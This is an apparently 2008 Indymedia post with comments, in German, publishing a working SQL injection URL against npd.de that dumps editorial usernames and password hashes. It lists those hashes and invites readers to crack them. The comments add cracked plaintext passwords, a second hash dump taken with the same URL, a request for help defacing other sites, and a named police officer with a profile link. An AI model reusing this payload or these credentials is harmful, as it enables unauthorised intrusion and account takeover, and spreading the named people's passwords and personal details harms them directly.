4 Andrea - Wer wird NPD.de cracken?

Codiernummer 15 20.10.2008 09:16
A tribute to Andrea N.: Völlig legal haben Wir gestern die Zugangsdaten der Homepage npd.de freigelegt. Nun bleibt nur noch die Frage: Wer wird die Hashes cracken?
Weblink zu den öffentlich-zugänglichen Hashes:

 http://medien02.npd.de/index.php?step=1&grptyp=-1%20union%20select%201,concat(wa_config_redaktion_username,0x3a,wa_config_redaktion_passwort),3,4,5,6,7%20from%20wa_config_redaktion%20--%20f

kbeier:*1953679836E5B388613B91544677B4A6D22EC341
sköster:*2AAF073E85BF672E35D92F9E2A7116F024BF80D
uvoigt:*9A2F03B4C0624AA5F21B3C7D9123982E8AE6A1A7
jhähnel:*2489BE3E6A8F2E3E489E48088E6055DC82F806D6
bbieder:*9470980E3155B135B2A494C3BEB08D45F75232D5
gelleneu:*9F86B35BD4D155FDDB0EF7A764B0A0FBF6176063
dpetereit:*79EFC814538CF289D4B05CD08B01CE5C4816FAE7

Bitte kommt alle zur Gerichtsverhandlung in Berlin am 23.10.2008 im Amtsgericht Tiergarten Raum 371 um 10 Uhr 30 um die Antifaschistin Andrea gegen codierten Streifenhörnchen zu unterstützen.

Ob Nazis oder verkleidete Schweinebacken - Wir decodieren Euch alle!
Creative Commons-Lizenzvertrag Dieser Inhalt ist unter einer
Creative Commons-Lizenz lizenziert.
Indymedia ist eine Veröffentlichungsplattform, auf der jede und jeder selbstverfasste Berichte publizieren kann. Eine Überprüfung der Inhalte und eine redaktionelle Bearbeitung der Beiträge finden nicht statt. Bei Anregungen und Fragen zu diesem Artikel wenden sie sich bitte direkt an die Verfasserin oder den Verfasser.
(Moderationskriterien von Indymedia Deutschland)

Ergänzungen

Beiträge die keine inhaltliche Ergänzung darstellen

Verstecke die folgenden 10 Kommentare

2 Passwörter

Daten-Antifa 20.10.2008 - 09:25
jhähnel:degrelle

dpetereit:caspardavid

nicht so schlau

il-egal 20.10.2008 - 10:36
nun werden die passwoerter geaendert, und gut ist. probierts aus:

 http://weltautor.npd.de/

Wer ist Andrea N.?

Roland Ionas Bialke 20.10.2008 - 10:42
Andrea wurde am 1.12.2007 auf einer Demonstration gegen einen NPD-Aufmarsch in Berlin-Rudow durch Claudia Bauch festgenommen. Bauch gehört einer Berliner Staatsschutzeinheit der Polizei an (LKA 534 PMS) die speziell gegen Menschen aus dem "linken" Spektrum ermittelt. Bei diesen Ermittlungen verstossen die Polizisten und Polizistinnen dieser Einheit gegen Gesetze: Sie legen illegale Datensätze an, infiltrieren illegal Demonstrationen, sagen illegal maskiert und codiert im Gerichtssaal aus und hören auch illegal Anwalstgespräche ab.

Claudia Bauch (LKA 534 PMS) -  http://sondereinheit.fateback.com/0158.html

Mehr Informationen über Andrea findet Ihr auf dem Blog Ihrer Solidaritätsgruppe. Bei der Verhandlung am 23.10.2008 wird wieder ein codierter und verkleideter Polizist aussagen. Diesmal gegen Andrea.

 http://freeandrea.blogsport.de/

@ il-egal

Roland Ionas Bialke 20.10.2008 - 10:50
Die Seite muss die NPD doch so oder so offline nehmen, denn ein bloses ändern der Passwörter ändert nichts daran, dass die Hashes (der dann geänderten Passwörter) öffentlich auf der NPD-Seite gespeichert sind.

Ansonsten empfehle ich eine Debatte über eine Organisation der Daten-Antifa anzuregen. Hast schon recht, Ressourcen werden mangels Organisation oft nicht richtig genutzt. Stichwort: B&H

Die neuen Hashs

egal 20.10.2008 - 11:37
Die aktuellen Hashs lassen sich unter der URL abrufen:

 http://medien02.npd.de/index.php?step=1&grptyp=-1%20union%20select%201,concat(wa_config_redaktion_username,0x3a,wa_config_redaktion_passwort),3,4,5,6,7%20from%20wa_config_redaktion%20--%20f

Andern nützt da nix! Hier die momentanen Hashs:


kbeier:*A93EBA1F91D64E52119A42DABB10A11D9574F12B

uvoigt:*7A7BFFC2CD5FF7C517BFA8BEE9A2B25E877365D7

jhähnel:*3113F97B7321E96D1F9A67576BB9D2711078172B

bbieder:*6AE140387B51C3170E78675CEB175BFB471962F3

gelleneu:*C3F222BBEAB95B5DEA9D9554BA93D10D68120578


Und hier ein Artikel über Andreas Verhandlung:

 http://de.indymedia.org/2008/10/229440.shtml

Wenn die Nazis nicht noch dümmer...

Mr. Drebben 20.10.2008 - 14:52
...als Toastbrot sind, dann sind diese neuen Hashes von Strings, die deutlich länger sind, als dass sie per bf knackbar wären. Deshalb lohnen die neuen Hashes natürlich schon. Ab jetzt ist es witzlos.

TOTAL SINNLOS!

OMG 20.10.2008 - 17:35
Ihr Kinder versaut die ganze Arbeit der Datenantifa, mit euren
blöden gepose im Web. Das war einer der stupidesten Aktionen
überhaupt.. was bringt es die Hashes hier auf Indymedia zu posten?
Hier lesen auch Nazis mit, desweiteren hätte man doch mehr als
nur die Hashes publizieren können.. nun ist alles versaut
dank euch schei* Kiddys!

@omg

nicht so wichtig 20.10.2008 - 17:45
hast wohl ein bischen panik.
die datenantifa hatte ihre chance,jetzt sind wir dran und darum danke für die hashes

Was es bringt

Kiddie 20.10.2008 - 19:32
"was bringt es die Hashes hier auf Indymedia zu posten?
Hier lesen auch Nazis mit, desweiteren hätte man doch mehr als
nur die Hashes publizieren können.. nun ist alles versaut
dank euch schei* Kiddys!"

Es geht in diesen Artikel nicht nur um den Zugang zur npd.de-Administration, sondern besonders um Andrea. Eine defacte Homepage ist innerhalb weniger Minuten wiederhergestellt. Eine gefakte Information innerhalb weniger Minuten gelöscht. Die Informationen wurden gesaugt, die Nazis haben davon Wind bekommen - Warum sollte da eine Veröffentlichung des Exploits entgegenstehen? Die Nazis bleiben verunsichert, denn es gibt noch eine Reihe weiterer solcher Sicherheitslücken.


wie kann ich webiste cracken?

anarhista 29.10.2008 - 11:43
kann jemand erklaeren wie kann man website hacken? es gibt viele nazi websiten und blogs so ich wollte auch einige brechen und dort (auf hauptseite) meine blabla machen/stellen. ich habe vor 10 Jahren software "webcracker" gehabt aber ich habe das jetzt nicht mehr und ich kann das nicht irgendwo finden... Zum Beispiel, ich wollte cracken:  http://blog.balder.org/ Das ist Danish nazi website. es kann man mit google uebersetzen und sehen ist das nazi oder nicht. bitte, hilfe! es kann man mir die Erklaerung durch mein website schicken. Tschuess